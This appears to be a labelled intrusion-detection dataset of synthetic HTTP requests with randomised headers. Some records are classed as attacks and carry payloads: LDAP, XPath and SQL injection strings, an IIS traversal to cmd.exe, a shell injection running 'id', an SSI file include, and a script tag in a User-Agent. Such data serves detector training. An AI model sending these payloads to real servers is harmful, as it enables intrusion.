If-Modified-Since: Sat, 13 Oct 07 06:38:52 UTC
If-Unmodified-Since: Mon, 10 Nov 08 20:07:22 UTC
If-Match: *
If-None-Match: "rKtUV-y03H5wic6G3M8W"
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 9874
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM b2NpZWRtaHRvc090d2Vld282bXRobnNrcmR0ZXR0UmQ1aWFzc3Q=
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: 3837-2
Referer: /t0eec/uTa53.php3
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/7.1 (X11; U; Linux i386 3.1; l2-c2; rv:9.1.0) Gecko/51254402
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: o2n/5.7 www.GBIru.js, 9.8 27.225.238.213
Transfer-Encoding: nfcTg; 3eJh=1pbrrne
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48027
Start - Id: 33718
class: Valid
PUT /iv/fKsagnicoyt/aVnIts9TLlWHZb/sgltcoaflh6hpeieoa/tTfGtc.Fms0p0EX.dll? HTTP/1.1
Content-Length: 194
Content-Language: uie,oato,pMat5nmt
Content-Encoding: deflate
Content-Location: http://www.0Okl.be/gxie.htm
Content-MD5: dEN0bmQwZ3RuOHBIcnU5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Sun, 09 Oct 05 21:12:54 UTC
Host: 74.109.18.61:80
Connection: mn7tad0
Accept: */*;q=0.7
Accept-Charset: iso-8859-5;q=0.3, gb2312
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: min-fresh=8
Client-ip: 178.20.130.175
Cookie: rmnaenoln1srl=3126306;ol893n9oi=i200A;mebweieotneoe=sCQHmr;et=tdAG
Cookie2: $Version="4"
Date: Thu, 21 Aug 08 09:49:06 CET
ETag: "eI63ieTvwWMSE-kfmw"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Wed, 01 Nov 06 01:31:15 GMT
If-Unmodified-Since: Tue, 20 Jun 06 07:29:27 CET
If-Match: *
If-None-Match: *
If-Range: "UsD8dWGdf8TtOoe-"
Max-Forwards: 33
MIME-Version: 5.8
Pragma: e8oo1=lnqner
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM ZWJqZ3Bxc2RwaWVxZXJya28zRWVtcTFnaWV0NHJlaGR3bmNuMWF4
Range: 46-99000
Referer: http://ftegr7a.com/uruUt4/Alobstlr/xrawTbp/etahi/Innuc.php3
TE: chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: ldincS/6.9.7.3
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 520x205
Via: 8.1 4.34.233.82, 6.1 245.224.38.40:85, FTP/1.0 226.26.118.28:804
Transfer-Encoding: compress
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hhheba=0575&Ndi_DQJGTYx=356&lchn3SgtH4nn=kMBrmYAv&rarsaufr4l=5&PQe5=2176&5traq0Aul=>&aaemwiTo2Ldlni=eJGdQMU0Cg&Ari766bb8e=0Sac&ansktilNueeoidy=hnoptuuo:rosao~r&8jtybxp_=rmTo@&xnata=40565

End - Id: 33718
Start - Id: 19439
class: Valid
GET /P4/wC1iqYy-z./8vdreceY11es/vDq6tiZ@i/imda4wU/r29rtaNwli8aiS6i.bin?seheaenez1d45o=aT09wuX7z7&44@i=uQ_EE6xfbYUf&nuaD307=%3Buoj3&Rdeeie=rOc4&l6Te4r=565485733&GtelnetvXqr@ii=i2e2+d%2F0tz&taiiu5e=Nmu%26hzvsttjtinsertn&eierfcIfqsawtr=i&n.ols6=fobjectNeDtdnoneserqennode&8XsEoptU_b80=+&ia8=gso%2Bnejtmett&en=eaB9 HTTP/1.0
Host: 247.157.47.105
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.1, iso-8859-4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 168.104.135.23
Cookie: ura7aIjvi=+l
Cookie2: $Version="7"
Date: Fri, 22 Apr 05 10:52:41 GMT
ETag: "Sf6CDf1aL8D3-Tcag"
Expect: ii4Il=cr9ndt;ddle7
From: rshehat@qllhSResb.de
If-Modified-Since: Fri, 01 Feb 08 04:46:38 UTC
If-Unmodified-Since: Mon, 31 May 04 15:27:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 92
MIME-Version: 0.9
Pragma: sikaelyT='xVtu'
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: teomr bsaanR=rnIroe
Range: -2,6-20086
Referer: http://www.ehSeusg.net/sshmOFbe/heeoutr/btntOoo.jpeg
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 3.1; ab-pe; rv:5.1.0) Gecko/37331035
UA-CPU: x86
UA-Disp: 984,861,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6480x436
Via: 9.9 www.UAdrz.htm, 1.4 www.egpslet1.html, 7.4 www.pl3zf.htm
Transfer-Encoding: deflate
Upgrade: 3tDr/0.3, octa/6.4
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 83.131.31.88
X-Serial-Number: 31641026520148
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19439
Start - Id: 37330
class: LdapInjection
GET /sQU@k85poNm/L@0RXVtI2y2JMC/fSRr40_Lie0og7S2lwN/psJPq_7Nh4jcv49.dll?necftauic3=EseSurt&N3s=1i4ZsDWlt7p&R5uaPwln=23469&xECR-Y5QvO=to&tdnets6horSAEh=2tbals%24iermo&Rhsba=uPA7eiyhppaexto&Sdngsi8dSITk=%28er-xuE+Mxl&fmrsy7ropcLtOse=7&inee9eroca=aL&et9n=lM-V&v4rcti5EDasat=cg4wUcl&sIloghttpsp=021&7A64Ac@vP=5Uoeahwfexecwl HTTP/1.0
Host: 95.201.152.23
Connection: close
Accept: text/*;q=0.3, image/gif, audio/x-wav
Accept-Charset: iso-8859-9, cp-932;q=0.7, shift_jis;q=0.5, x-mac-icelandic;q=0.2
Accept-Encoding: )  (  | (displayName=had*) (name=    had* )(   mail=had* )
Accept-Language: *;q=0.5
Cache-Control: Obae=euNel
Client-ip: 8.243.125.138
Cookie: Otefahse=r0zksehotendey;ai=nal;GexeccxRT=upa4;itit=85;lieealeo2zha=or6x9cn7edhh2m
Cookie2: $Version="04"
Date: Mon, 08 Oct 07 14:19:48 CET
ETag: W/"AgBJxgl1AIY7DzU9db"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Fri, 22 Jun 07 21:33:42 GMT
If-Unmodified-Since: Tue, 10 Jan 06 15:46:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: Digest qop=auth-int
Range: 1-568088,6956-8,075-
Referer: /niIi/efhar/cmsek/lvfz.gif
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 4.8; iw-os; rv:0.5.5) Gecko/96483924
UA-CPU: 68000
UA-Disp: 2661,0577,16
UA-OS: Solaris
UA-Color: color16
Via: 1.8 www.heTdc.jpeg:64723, FTP/7.2 137.162.177.89, 7.2 95.251.84.190
Transfer-Encoding: identity
Upgrade: iHmLaa/1.0, enm/6.7, Feqe/5.3, 5la06/5.6
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 100.131.43.78
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37330
Start - Id: 10290
class: Valid
GET /eyrmn/uynb8xai8itbwtn/eGMJ86Tc1jWyL/nYCV3Z1Cmn/aOuBSQFKAB3/eegn5nnoniMoaUdeefN/aI9@QK1/uYT/olwG6sgQVLvem/c..bin?y5otrM9euuN=i%3EBg11beerb8eee&on4hiAlhZ=eh&uea8tuEy=6238&xlq@rMDO8script=533591&htdq5raurc=urctastti&f6th=aLdform HTTP/1.1
Host: 3.35.121.1:80
Connection: rorddd
Accept: video/quicktime;q=0.7, application/zip;q=0.8
Accept-Charset: isiri-3342
Accept-Encoding: compress;q=0.2, deflate, compress;q=0.3, gzip;q=0.4
Accept-Language: or4r-g99Hr4a;q=0.7, iyl-4ta, a7wciani-en7iEo
Cache-Control: max-stale=1807
Client-ip: 207.49.125.231
Cookie: g3OVzN=esxGi;DqNwiM@imgechoPk=96;evHlef3N=andtcaHhtye;5y36o=h6k;tyfeCr2lstt=ot
Cookie2: $Version="10"
Date: Mon, 29 Nov 04 07:02:22 GMT
ETag: W/"4P2Ug0TqDrrOHlC"
Expect: 100-continue
From: nS3ts1a@t3dEl.it
If-Modified-Since: Tue, 01 Jan 08 10:39:07 UTC
If-Unmodified-Since: Sat, 03 Jan 09 17:57:22 CET
If-Match: *
If-None-Match: "2oOTfO13qDDukDsxp"
If-Range: Fri, 23 Dec 05 11:39:28 UTC
Max-Forwards: 1902
MIME-Version: 1.9
Pragma: oyco='eagrld'
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: NTLM b29heW9pdGVsbkhuZnRqYW4xc2hvYWR5YXNzZW9sd3l0bHc=
Range: 12-5596
Referer: http://erhh2pgh.st/uoaoe/yaihttb.bin
TE: deflate
Trailer: Via
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 4.5; ho-eh; rv:4.3.0) Gecko/91595764
UA-CPU: x86
UA-Disp: 118,0565,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 032x7737
Via: FTP/5.0 www.jAeR.jpg, 5.3 www.2iou.css
Transfer-Encoding: compress
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 190 www.iomdhe.css "SerawenwmntclI" 
X-Forwarded-For: 141.21.14.128
X-Serial-Number: 24986038742503918311
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 10290
Start - Id: 49474
class: XPathInjection
GET /t1B1jD7qf/esosnsm1mO5/lrvnif.jpg?-okCNOysIHB=marunetcat&iab1=esc%2Falh%2Ftut3af%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D6%5D+%7C+++2%2Faa%2FErcic%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D++or++%27sntuls%27+++%3D%27&@zftpinputEkCFwWm_=431 HTTP/1.1
Host: www.cTr7.uk:53
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: na-orr, srs6t0bl-Xhs2t, ag-d, e-a, ri-E
Cache-Control: max-age=27
Client-ip: 79.176.207.17
Cookie: hniaA=30471786;klanUttstf=fceil;ha6=159829;0a4=rShRhedeswohi0t7;ns=teo;UdRttz=ntin oflhAk
Cookie2: $Version="1"
Date: Tue, 24 Feb 09 07:28:45 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Thu, 11 May 06 16:51:59 CET
If-Match: *
If-None-Match: "acQoq1fTvp5ayMEI5"
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 5
MIME-Version: 2.1
Pragma: jesi=cml3no
Proxy-Authorization: so9ts otea6n=hdva
Authorization: ed4p ewtc5lar=tiKyS
Range: -012
Referer: /raattdn/oicoSec/1nJem.png
TE: trailers,gzip;q=0.2
Trailer: Cache-Control
User-Agent: l0HC_ceH6z http://www.eatn3.org
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 201583507
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49474
Start - Id: 41997
class: SqlInjection
GET /mt8ales/eHyfdT-48IAU/bnoizfy/sg0uB18DzDNf1qp/eh/oakwNqnpNXCpb7oYs/q761dEIb/ymARAIDrx/imotithjshc/ipY95YlLQtAv/re8.cfm?phignpersij4ioa=egxals2uso&SJnoWinserty=echotb&XinsertJMHZaexecscriptnopenH=594&qoRw=387+++or++id%3E6+++or++ls_id%3C10&e5csINyea=oiuDtiii&hy9ecdThi0be5os=7n+ruryhmemarc%3A&R80KVD=474&NKTqt=aXM0Q8Orq&mawM=lnMLyS0e&JVe=38507 HTTP/1.0
Host: www.Ce1Spt.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=31
Client-ip: 134.245.214.117
Cookie: cM7hts=zCvF;itjorcbhtinl=hKFxRblhY5y5;TNx6dTGgroup byoDC=ranOp;oneleaaoeUysetg=wTRwx-I1C;ni_aBV5@WHZE=e;dhisnessgswle=89rohb
Cookie2: $Version="419"
Date: Fri, 06 Feb 09 06:43:25 GMT
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Thu, 18 Mar 10 02:06:43 GMT
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: *
If-Range: *
Max-Forwards: 0679
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic eGFpYWg6ZVlubGxzUg==
Authorization: Digest opaque="5ntntDl"
Range: -728027,84041-8,736156-
Referer: /2dhlanu/ahLBt.swf
TE: gzip,deflate,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.9 (compatible; scas; Linux i586; tmhtw; aaumolrim; BgtiRolc2l)
UA-CPU: StrongARM
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: FTP/5.6 www.elSc3tt0.shtml
Transfer-Encoding: compress
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41997
Start - Id: 36531
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.nno1.org:11
Connection: tifhoero
Accept: text/*, image/gif;q=0.8
Accept-Charset: isiri-3342, shift_jis, euc-tw;q=0.2, cp-932, utf-8;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: s8othnte-aeh;q=0.6, hyruu-yeztchtm, awe-aUj;q=0.6
Cache-Control: adtieer='Ia'
Client-ip: 213.233.54.110
Cookie: ts=icakmtrnswhaMwvna;etnaer=dNtmU
Cookie2: $Version="647"
Date: Sun, 10 Jan 10 11:08:52 UTC
ETag: W/"NVc7rgRLv9r5cKh@1zV"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Thu, 13 Jul 06 15:30:09 CET
If-Unmodified-Since: Sat, 10 Dec 05 22:09:01 GMT
If-Match: "v-9C0a9p1KtEsLo"
If-None-Match: "0RqlRF4b9-CNZsl_q"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 8691
MIME-Version: 0.9
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 5533-,1-40976
Referer: http://www.eiieamw.gov/tolvd1/J6I7/4eRhlpe.msf
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 7.1; 5u-po; rv:2.5.6) Gecko/51785675
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: gzip
Upgrade: ernz/8.4, hotewo/3.0, etdeas/6.6, nbu/1.6, owgLo/3.9
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 212561
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36531
Start - Id: 37277
class: LdapInjection
POST /Aohyas/t68HEFMUyS@8DquZv/sm/MlWHqoptEOcmdCj/TV/On2fasitSmn/seainaIIaaAdes/ewhk90Iw/nUk3UQ02/ieitaYaettesp.php? HTTP/1.1
Content-Length: 171
Content-Language: tuer7et,ee,eplw9x
Content-Encoding: compress
Content-Location: http://xgttaaot.net/0pbe1at.txt
Content-MD5: b2lUbnZzNmRpZDVzY3NseQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Sun, 09 Jul 06 23:08:53 CET
Host: www.dPealpfnH.fr
Connection: close
Accept: application/rtf, application/*;q=0.9, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, identity;q=0.3, deflate;q=0.0, gzip;q=0.2
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: max-age=81
Client-ip: 202.73.191.187
Cookie: p6UL@Q8VR=lnhuty7irtd:j~
Date: Tue, 15 Apr 08 14:21:57 UTC
ETag: "W7ImO@K1P_no6ae.z"
If-Modified-Since: Tue, 02 Nov 04 05:16:04 UTC
If-Match: *
If-None-Match: "VA0sof3JPxJDPIiM"
If-Range: *
Max-Forwards: 67
Pragma: ea0iMh='t'
Authorization: Basic dG5ubzplcmxyeQ==
Referer: /u9eT/eBmk/toets.asmx
Trailer: TE
User-Agent: heaoanrnya (eBkPNxy6T0; fV03Fvega; o9Ykqt6; e6wzKIFvA8)

shdlie=o96s&htyjInbkrn5snde=1gbi&nrlipdeusus=tr6pw)(thn&mrsad9eoqihM1=4323779&Teewetecg=~adpasswdmal&snhmiAhsiohgI=dyu7RvoEiOnrsj&onznjydsrc=heo7 &naern=pvaoNermena9

End - Id: 37277
Start - Id: 40656
class: SSI
GET /FLsq0G5O/httpAP-_XrD.png?oetrc8aassn4mrw=4885518062&foernteaeoea=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&8ltmettkah=993982&oi=z%2B&wenayrctc=ldlpt HTTP/1.1
Host: www.tesedg.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ieii2-t0
Cache-Control: no-cache
Cookie: Sprtqadrm0otEs=iwi;o9l4sd6oItT0u=ozUnVN.M98x;swset=955
Cookie2: $Version="6"
Date: Fri, 20 Apr 07 01:14:50 CET
ETag: "Wx2dKH1wi9MYU.2"
Expect: 100-continue
From: fneotmo@Leorx2bmoi.st
If-Unmodified-Since: Mon, 27 Feb 06 09:55:26 CET
If-None-Match: "mbUBdyiFLE8akywo.bs"
If-Range: *
Pragma: sl=nG
Authorization: Digest opaque="ttsfhra"
Referer: /22on6/fmpLrWky/U4hLe/d9drmoBo/trsehc.htm
TE: deflate;q=0.7,trailers,trailers
Trailer: From
User-Agent: whu_lEiO http://www.meA8ttv.net
UA-Color: color32
Via: 1.1 126.180.156.12, 9.6 www.vvlshA.jpeg
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40656
Start - Id: 22737
class: Valid
GET /tM/er0aalaoWxaa0/5n6trnmrrm0XpA0no/eaggas4Sunnaoza/8AGx/mem4magv8aeerIejedzN/iaim/ys@k5WjjAj/eFWXt1XixKKPQdz/beoaptict/x0Ddsxasulowsqkxabfr/oPwcg7e.php4? HTTP/1.0
Host: www.8oteef6it.org
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.3, x-mac-greek;q=0.8, euc-cn;q=0.3, x-mac-arabic;q=0.6
Accept-Encoding: deflate, identity
Accept-Language: anhayt-nyskni
Cache-Control: no-store
Client-ip: 111.95.11.244
Cookie: MdeletenPV1IV=nslnQs;5gs3r=nGdlhdua0ima;K9Q1etc292AM=ynAJOWG9QOG;if2timeEapt=~nrwp-s
Cookie2: $Version="62"
Date: Mon, 09 Feb 04 09:41:50 GMT
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: loaig=e0ueme
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Mon, 04 Jun 07 05:17:34 GMT
If-Unmodified-Since: Sun, 17 Apr 05 09:37:57 CET
If-Match: *
If-None-Match: *
If-Range: "NiCAAkqLwjFJ4qKhlk"
Max-Forwards: 5079
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Digest uri=/hoiTptrr/lKaatsus/knaA.php4
Range: -59538
Referer: /etstk/it33/tglan/ihdlns.jsp
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 8.1; ao-l3; rv:7.4.5) Gecko/90504108
UA-CPU: MIPS
UA-Disp: 482,155,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: HTTP/0.8 www.s8me2psw.html:62555, FTP/1.0 www.eOmenis.jpeg:1219, HTTP/8.3 www.3itew.shtml
Transfer-Encoding: gzip
Upgrade: nt4mte/1.5, e7ttw/7.8, rqstaj/5.3, 2fytn/3.2, adu/2.2
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22737
Start - Id: 15959
class: Valid
GET /8tran/ma0rtbw3a4Qei/cDLn6pUX9.VogA87P5L/ac0/rattiomtan3rab9etn/BautkaFcOa/lzBnUowa-N1KGnY/hlkeetssonst/bete66rssN/tF@PpUZknoJ76jdb@aOi/aT/in5Reay.jpeg?dpdrdTtdl5d=3616&qlmtaa5hestlbse=aSoRu_W0 HTTP/1.1
Host: www.lcaiaEAJs8.biz
Connection: hfdtmuia
Accept: video/*, audio/basic
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 78.76.44.196
Cookie: eG=etunionimgxp_lhx4Etne@sWes;Dwindow.open1Kkeagxp_5IT=8148;HrKXP-wN6jD=5080191632
Cookie2: $Version="998"
Date: Sat, 21 Jun 08 13:38:28 GMT
ETag: W/"T0MInWnHE8ZnqAu0"
Expect: yt6uimt
From: ddlde@onchnbe.de
If-Modified-Since: Thu, 13 Dec 07 06:47:55 GMT
If-Unmodified-Since: Sun, 27 Nov 05 13:19:37 GMT
If-Match: "-TNjLF6Iz9iNdwhFnN"
If-None-Match: "M09@u8mNWNKdpj1T"
If-Range: *
Max-Forwards: 591
MIME-Version: 7.5
Pragma: enDe0lj=ah
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest algorithm=MD5
Range: 12018-93,2400-683
Referer: http://dneihiId.gov/zetw.bin
TE: chunked,deflate;q=0.9
Trailer: Transfer-Encoding
User-Agent: nettsNtt (gOADV9E_)
UA-CPU: MIPS
UA-Disp: 9788,9519,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7490x6757
Via: 2.4 179.148.212.98, FTP/7.0 www.Ciw9r.js, scV/7.8 227.216.227.244:681
Transfer-Encoding: identity
Upgrade: oMedk/7.8, rxn/7.9, niS/0.4
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 37.146.157.183
X-Serial-Number: 902795825
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15959
Start - Id: 43440
class: OsCommanding
GET /icu4sl/iwptwetnt1wot/s2e/gJ6KmH@KVtr/hbD-b@fx0BY/ens0seulm/odZmGEM9d2aPS7@eU/7aR99P5jEr/AmMSBLexec_9W.jpeg?emhno9fa=98&titL=%25++%2Bwll&IM-yNv=whut&1egzEdscbf=%7C+++echo+++++%22+Content-Type%3A+text%2Fhtml%22++%3Becho+++++%22%22+++%3B+++++id++%5C0&lyendtndcttkxar=6623&3LnlnhlP=enx&dSn6oooon7enf=1q%3FhtCrxd&rxr7bs=6137&sU@_hc_adminfQA=ipfarmoe3tdxvlrf5h HTTP/1.1
Host: www.twdrrt.com
Connection: eeiwt
Accept: video/*;q=0.8, application/x-tar, video/mpeg;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: b-ttst;q=0.1, gtns1-uhtsd, i56u-Ohsr6;q=0.0, lk9et1o-3e;q=0.9
Cache-Control: min-fresh=0
Client-ip: 87.24.160.134
Cookie: ewn=we;26edjmS=57692;ur8neiaeiodtzw=rformhg 8lebt9aiym
Cookie2: $Version="4"
Date: Sat, 05 Apr 08 12:53:35 GMT
ETag: W/"s9u-oZzMeEZFqxQxDc3j"
Expect: a9incnt
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Mon, 12 Jul 04 03:12:43 CET
If-Match: *
If-None-Match: "bLyposXZ74BS7lpBB"
If-Range: Tue, 12 Jan 10 21:20:43 CET
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: yst='tDroi'
Proxy-Authorization: Digest uri=/7hmcto/mcseerrc.css
Authorization: tfatc udrooN=zitn
Range: 89-81,36-,438-
Referer: /rdtnsse.mspx
TE: chunked,deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: amnbs3s1ttdo
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: identity
Upgrade: nb0Mi/9.5, daegas/8.7, tiso/6.9, rtN/5.7
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43440
Start - Id: 46619
class: XSS
GET /n_IoHdIQL8/hfsanmmEeii/n_Zp8ZiXA16Icb49W/aMr/iXEnmoLJUh/X8zGp0adminMz/stoter7tesil.php?towdlcamtmsa=h&oe=tnrso%7E5elt&8ryAhctldmwx=e.N HTTP/1.0
Host: 209.254.137.183:05126
Connection: Nstgm
Accept: video/*, video/*, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 152.27.71.121
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="61"
Date: Tue, 30 Jan 07 01:32:58 UTC
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: aEly1e@etafje.gov
If-Modified-Since: Mon, 02 May 05 09:00:16 CET
If-Unmodified-Since: Wed, 24 Sep 08 24:04:47 UTC
If-Match: "E1g3EB@jpF33Xko_2PjU"
If-None-Match: "lc4CEALXcjjxnBNr"
If-Range: "q50eA3iD0coTiyac_1fL"
Max-Forwards: 75
MIME-Version: 5.6
Pragma: ooMli=A72
Proxy-Authorization: ttee s1Iw=adt6gI
Authorization: NTLM aUh0ZW5IZW5laUhBaW5keXBvc2Fxb2V2c2lhcnBFYzVhWWJWbnNjdmdpeWFydHo=
Range: 7283-8
Referer: http://4e19eoEr.st/rkmwH/1osHd/tsere.tiff
TE: chunked
Trailer: If-None-Match
User-Agent: <style ><!--</style   ><script >[alert  ('s5slo4');]//--></script  >
UA-CPU: 68000
UA-Disp: 487,2681,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/5.9 74.134.254.141, 7.7 172.180.171.6, 8.1 www.ld2b.js
Transfer-Encoding: gzip
Upgrade: edw/7.9, a9aldo/9.4, p2zc/2.5, sti/1.5
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 1432096438737342
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46619
Start - Id: 13864
class: Valid
